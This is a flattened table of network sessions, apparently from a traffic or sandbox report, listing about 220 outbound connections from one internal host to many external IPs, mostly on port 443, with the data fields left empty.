

                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12359192.168.2.2355468130.212.173.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12360192.168.2.2339528110.113.155.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12361192.168.2.235376036.174.16.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12362192.168.2.2358292118.208.223.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12363192.168.2.236000864.14.246.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12364192.168.2.2359720206.180.70.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12365192.168.2.235337441.52.126.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12366192.168.2.2355962180.176.245.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12367192.168.2.2348592187.86.127.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12368192.168.2.2346378173.106.81.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12369192.168.2.2349586212.162.18.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12370192.168.2.2344888209.189.40.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12371192.168.2.2354128113.185.178.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12372192.168.2.235861846.112.226.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12373192.168.2.2357962143.181.50.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12374192.168.2.2356032112.80.252.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12375192.168.2.2350700114.20.127.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12376192.168.2.2354098130.14.107.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12377192.168.2.233350246.91.78.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12378192.168.2.2342884175.125.246.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12379192.168.2.235572639.122.112.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12380192.168.2.235117474.202.111.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12381192.168.2.2339024195.132.160.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12382192.168.2.2346584138.86.159.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12383192.168.2.2356496136.246.67.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12384192.168.2.2351094201.36.125.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12385192.168.2.2343336149.98.157.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12386192.168.2.235596475.45.63.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12387192.168.2.2335718109.143.94.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12388192.168.2.2356978146.175.142.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12389192.168.2.2346100104.32.32.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12390192.168.2.235446240.211.248.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12391192.168.2.2341058200.114.169.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12392192.168.2.2355982186.144.101.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12393192.168.2.2333292141.212.118.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12394192.168.2.233490625.121.96.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12395192.168.2.2353166134.24.91.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12396192.168.2.2336662205.166.91.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12397192.168.2.2354554173.46.99.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12398192.168.2.233700012.219.43.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12399192.168.2.234494637.13.159.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12400192.168.2.2345792208.49.21.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12401192.168.2.2350308204.128.163.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12402192.168.2.234976492.211.223.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12403192.168.2.235749645.95.186.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12404192.168.2.235037641.211.224.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12405192.168.2.234162051.231.93.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12406192.168.2.235542297.218.35.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12407192.168.2.2345796185.224.209.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12408192.168.2.234374245.13.203.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12409192.168.2.2354312188.208.125.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12410192.168.2.233487885.197.28.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12411192.168.2.2338530206.126.225.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12412192.168.2.234782258.254.155.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12413192.168.2.234638481.112.185.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12414192.168.2.2336686184.200.225.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12415192.168.2.233305466.46.128.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12416192.168.2.2340414217.11.226.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12417192.168.2.233341254.3.145.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12418192.168.2.2344732151.244.69.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12419192.168.2.234147290.174.49.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12420192.168.2.233798246.42.69.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12421192.168.2.233913012.185.40.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12422192.168.2.234405076.19.217.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12423192.168.2.2334266158.139.74.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12424192.168.2.2347362102.214.133.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12425192.168.2.2353894216.247.215.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12426192.168.2.235269235.66.243.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12427192.168.2.2344518206.208.38.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12428192.168.2.234650083.249.21.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12429192.168.2.235600024.33.101.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12430192.168.2.235474641.253.99.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12431192.168.2.234970443.239.148.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12432192.168.2.234672613.24.40.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12433192.168.2.235067461.195.87.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12434192.168.2.2356160181.62.156.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12435192.168.2.233628280.83.28.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12436192.168.2.234591889.170.123.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12437192.168.2.235968496.142.51.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12438192.168.2.234157461.168.76.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12439192.168.2.236093632.19.129.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12440192.168.2.2360840217.152.7.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12441192.168.2.2355698210.213.76.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12442192.168.2.2350026191.202.15.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12443192.168.2.234105467.209.79.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12444192.168.2.234299254.161.202.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12445192.168.2.2339948126.33.127.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12446192.168.2.2334332122.72.172.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12447192.168.2.234162694.255.34.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12448192.168.2.234094214.88.129.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12449192.168.2.235028453.22.228.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12450192.168.2.233487264.9.6.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12451192.168.2.235385262.31.254.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12452192.168.2.2353900179.208.181.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12453192.168.2.234364843.24.180.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12454192.168.2.2353734219.92.22.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12455192.168.2.234001488.206.96.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12456192.168.2.23436965.54.79.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12457192.168.2.235798867.25.177.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12458192.168.2.235316671.7.120.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12459192.168.2.2341654203.253.137.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12460192.168.2.2342508158.217.50.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12461192.168.2.234691660.126.36.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12462192.168.2.2351864148.128.94.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12463192.168.2.2339064163.254.170.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12464192.168.2.2350934221.226.13.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12465192.168.2.233948069.150.37.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12466192.168.2.2336822218.15.221.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12467192.168.2.2347584175.181.243.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12468192.168.2.2346682125.70.118.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12469192.168.2.235004463.74.116.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12470192.168.2.234773417.93.98.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12471192.168.2.233466861.137.241.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12472192.168.2.2358870182.121.149.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12473192.168.2.2340470170.77.249.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12474192.168.2.233512265.253.94.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12475192.168.2.234265639.20.177.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12476192.168.2.2356946191.221.152.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12477192.168.2.23336829.247.72.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12478192.168.2.2334198190.247.8.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12479192.168.2.2340812191.198.2.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12480192.168.2.2352368173.48.192.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12481192.168.2.235762673.40.90.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12482192.168.2.2334576191.195.119.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12483192.168.2.2339610223.69.216.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12484192.168.2.2349622173.22.59.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12485192.168.2.2358480179.193.13.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12486192.168.2.235120443.163.248.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12487192.168.2.2346528105.157.9.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12488192.168.2.233975836.148.119.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12489192.168.2.2356620145.24.114.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12490192.168.2.235448239.31.167.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12491192.168.2.2357300117.181.255.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12492192.168.2.2342772137.126.158.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12493192.168.2.2333144218.250.199.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12494192.168.2.233314875.92.231.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12495192.168.2.234375487.44.216.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12496192.168.2.235702845.105.154.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12497192.168.2.235315843.0.115.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12498192.168.2.234634227.7.243.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12499192.168.2.235650689.78.25.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12500192.168.2.23423509.83.25.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12501192.168.2.234762041.55.101.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12502192.168.2.2339174151.100.174.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12503192.168.2.23395842.78.3.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12504192.168.2.2351278174.190.157.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12505192.168.2.236082670.136.239.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12506192.168.2.2359258194.250.85.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12507192.168.2.2359654159.64.103.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12508192.168.2.2346230189.89.52.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12509192.168.2.23552285.244.23.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12510192.168.2.2337762197.208.176.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12511192.168.2.2351094135.167.113.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12512192.168.2.2356876168.11.42.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12513192.168.2.2337080192.126.182.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12514192.168.2.2344564141.225.79.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12515192.168.2.2343138157.106.242.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12516192.168.2.2334084180.168.170.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12517192.168.2.2343282122.66.215.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12518192.168.2.2342592183.227.252.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12519192.168.2.234171660.9.151.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12520192.168.2.23334002.164.251.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12521192.168.2.2352950147.51.37.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12522192.168.2.2332944208.216.207.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12523192.168.2.2352590199.13.111.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12524192.168.2.235200049.115.207.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12525192.168.2.2348268176.144.49.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12526192.168.2.234948645.15.92.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12527192.168.2.2335172161.182.55.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12528192.168.2.2334370198.64.159.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12529192.168.2.2351638138.249.130.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12530192.168.2.234034469.218.139.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12531192.168.2.2359738136.43.229.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12532192.168.2.2357000164.202.185.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12533192.168.2.23368321.42.121.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12534192.168.2.23556369.79.198.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12535192.168.2.2356218204.179.186.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12536192.168.2.234153448.34.79.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12537192.168.2.2335020151.189.89.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12538192.168.2.2359020187.199.181.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12539192.168.2.2349102153.101.249.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12540192.168.2.235847448.208.77.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12541192.168.2.2338158149.249.118.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12542192.168.2.2346566146.163.187.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12543192.168.2.234957683.144.145.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12544192.168.2.236036048.158.35.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12545192.168.2.2349016201.16.9.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12546192.168.2.2344936189.252.109.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12547192.168.2.2335464192.78.140.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12548192.168.2.233477075.122.12.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12549192.168.2.234071672.146.37.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12550192.168.2.2360904184.170.18.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12551192.168.2.23359781.21.222.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12552192.168.2.23370681.65.127.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12553192.168.2.234236841.100.159.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12554192.168.2.2347190205.31.192.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12555192.168.2.2351284122.130.2.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12556192.168.2.2359650218.156.159.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12557192.168.2.235207867.70.7.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12558192.168.2.234306425.16.63.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12559192.168.2.233653027.172.154.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12560192.168.2.235506445.124.102.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12561192.168.2.2348250166.40.125.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12562192.168.2.2354932137.239.48.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12563192.168.2.235240012.242.180.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12564192.168.2.2357568184.88.55.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12565192.168.2.2345546107.17.109.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12566192.168.2.234508462.5.147.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12567192.168.2.233449841.35.63.3537215
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12568192.168.2.233651067.34.55.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12569192.168.2.2351394178.180.133.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12570192.168.2.2337468163.58.184.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12571192.168.2.234729435.33.14.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12572192.168.2.2353584221.56.125.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12573192.168.2.233866672.161.211.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12574192.168.2.2333690116.7.180.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12575192.168.2.2341406115.8.12.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12576192.168.2.2356530188.38.25.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12577192.168.2.2337446212.78.126.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12578192.168.2.2337466135.202.128.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12579192.168.2.2344524193.103.3.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12580192.168.2.2357422210.188.81.187443
                                            TimestampBytes transferredDirectionData


